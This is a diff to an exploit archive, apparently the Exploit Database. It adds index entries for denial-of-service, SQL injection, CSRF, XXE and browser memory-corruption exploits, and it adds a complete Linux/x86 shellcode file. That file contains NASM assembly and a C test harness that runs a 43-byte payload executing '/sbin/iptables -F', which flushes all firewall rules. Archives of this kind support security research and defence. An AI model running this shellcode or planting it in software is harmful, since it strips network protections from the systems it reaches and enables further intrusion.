@@ -6419,6 +6419,9 @@ id,file,description,date,author,type,platform,port
 46822,exploits/windows/dos/46822.py,"SpotPaltalk 1.1.5 - Denial of Service (PoC)",2019-05-10,"Alejandra Sánchez",dos,windows,
 46823,exploits/windows/dos/46823.py,"ASPRunner.NET 10.1 - Denial of Service (PoC)",2019-05-10,"Victor Mondragón",dos,windows,
 46824,exploits/windows/dos/46824.py,"PHPRunner 10.1 - Denial of Service (PoC)",2019-05-10,"Victor Mondragón",dos,windows,
+46830,exploits/windows/dos/46830.py,"SpotMSN 2.4.6 - Denial of Service (PoC)",2019-05-13,"Victor Mondragón",dos,windows,
+46831,exploits/windows/dos/46831.py,"DNSS 2.1.8 - Denial of Service (PoC)",2019-05-13,"Victor Mondragón",dos,windows,
+46837,exploits/multiple/dos/46837.html,"Google Chrome V8 - Turbofan JSCallReducer::ReduceArrayIndexOfIncludes Out-of-Bounds Read/Write",2019-05-13,"Google Security Research",dos,multiple,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@@ -41250,8 +41253,13 @@ id,file,description,date,author,type,platform,port
 46804,exploits/multiple/webapps/46804.txt,"Prinect Archive System 2015 Release 2.6 - Cross-Site Scripting",2019-05-07,alt3kx,webapps,multiple,80
 46811,exploits/linux/webapps/46811.txt,"NetNumber Titan ENUM/DNS/NP 7.9.1 - Path Traversal / Authorization Bypass",2019-05-08,MobileNetworkSecurity,webapps,linux,
 46815,exploits/php/webapps/46815.txt,"Zoho ManageEngine ADSelfService Plus 5.7 < 5702 build - Cross-Site Scripting",2019-05-09,"Ibrahim Raafat",webapps,php,
-46820,exploits/multiple/webapps/46820.txt,"TheHive Project Cortex < 1.15.2 - Server-Side Request Forgery",2019-05-10,"Alexandre Basquin",webapps,multiple,
+46820,exploits/multiple/webapps/46820.txt,"Cortex Unshortenlink Analyzer < 1.1 - Server-Side Request Forgery",2019-05-10,"Alexandre Basquin",webapps,multiple,
 46825,exploits/jsp/webapps/46825.txt,"dotCMS 5.1.1 - HTML Injection",2019-05-10,"Ismail Tasdelen",webapps,jsp,
 46826,exploits/hardware/webapps/46826.txt,"RICOH SP 4510DN Printer - HTML Injection",2019-05-10,"Ismail Tasdelen",webapps,hardware,
 46827,exploits/hardware/webapps/46827.txt,"RICOH SP 4520DN Printer - HTML Injection",2019-05-10,"Ismail Tasdelen",webapps,hardware,
 46828,exploits/multiple/webapps/46828.txt,"CyberArk Enterprise Password Vault 10.7 - XML External Entity Injection",2019-05-10,"Marcelo Toran",webapps,multiple,
+46832,exploits/php/webapps/46832.txt,"SOCA Access Control System 180612 - Information Disclosure",2019-05-13,LiquidWorm,webapps,php,
+46833,exploits/php/webapps/46833.txt,"SOCA Access Control System 180612 - SQL Injection",2019-05-13,LiquidWorm,webapps,php,80
+46834,exploits/php/webapps/46834.txt,"SOCA Access Control System 180612 - Cross-Site Request Forgery (Add Admin)",2019-05-13,LiquidWorm,webapps,php,
+46835,exploits/php/webapps/46835.txt,"XOOPS 2.5.9 - SQL Injection",2019-05-13,"felipe andrian",webapps,php,80
+46838,exploits/php/webapps/46838.txt,"OpenProject 5.0.0 - 8.3.1 - SQL Injection",2019-05-13,"SEC Consult",webapps,php,

files_shellcodes.csv

@@ -964,3 +964,4 @@ id,file,description,date,author,type,platform
 46800,shellcodes/generator/46800.txt,"Linux/x86 - Multiple keys XOR Encoder / Decoder execve(/bin/sh) Shellcode (59 bytes)",2019-05-06,"Xavi Beltran",shellcode,generator
 46801,shellcodes/linux_x86/46801.txt,"Linux/x86 - shred file Shellcode (72 bytes)",2019-05-06,strider,shellcode,linux_x86
 46809,shellcodes/linux_x86/46809.c,"Linux/x86 - execve /bin/sh Shellcode (20 bytes)",2019-05-08,Rajvardhan,shellcode,linux_x86
+46829,shellcodes/linux_x86/46829.c,"Linux/x86 - /sbin/iptables -F Shellcode (43 bytes)",2019-05-13,"Xavi Beltran",shellcode,linux_x86

shellcodes/linux_x86/46829.c

@@ -0,0 +1,52 @@
+# Title: Linux/x86 - /sbin/iptables -F Shellcode (43 bytes)
+# Author: Xavi Beltran
+# Date: 11/05/2019
+# Contact: xavibeltran@protonmail.com
+# Webpage: https://xavibel.com
+# Purpose: flush iptables rules
+# Tested On: Ubuntu 3.5.0-17-generic
+# Arch: x86
+# Size: 43 bytes
+
+#################################### iptables-flush.nasm  ####################################
+
+global _start			
+
+section .text
+_start:
+	xor eax, eax
+	push eax
+	push word 0x462d
+	mov esi, esp
+	push eax
+	push dword 0x73656c62
+	push dword 0x61747069
+	mov edi,esp
+	push dword 0x2f2f6e69
+	push dword 0x62732f2f
+	mov ebx, esp
+	push eax
+	push esi
+	push edi
+	mov ecx, esp
+	mov al, 11
+	int 0x80
+
+####################################### shellcode.c  #######################################
+
+#include<stdio.h>
+#include<string.h>
+
+unsigned char code[] = \
+"\x31\xc0\x50\x66\x68\x2d\x46\x89\xe6\x50\x68\x62\x6c\x65\x73\x68\x69\x70\x74\x61\x89\xe7\x68\x69\x6e\x2f\x2f\x68\x2f\x2f\x73\x62\x89\xe3\x50\x56\x57\x89\xe1\xb0\x0b\xcd\x80";
+
+main()
+{
+
+	printf("Shellcode Length:  %d\n", strlen(code));
+
+	int (*ret)() = (int(*)())code;
+
+	ret();
+
+}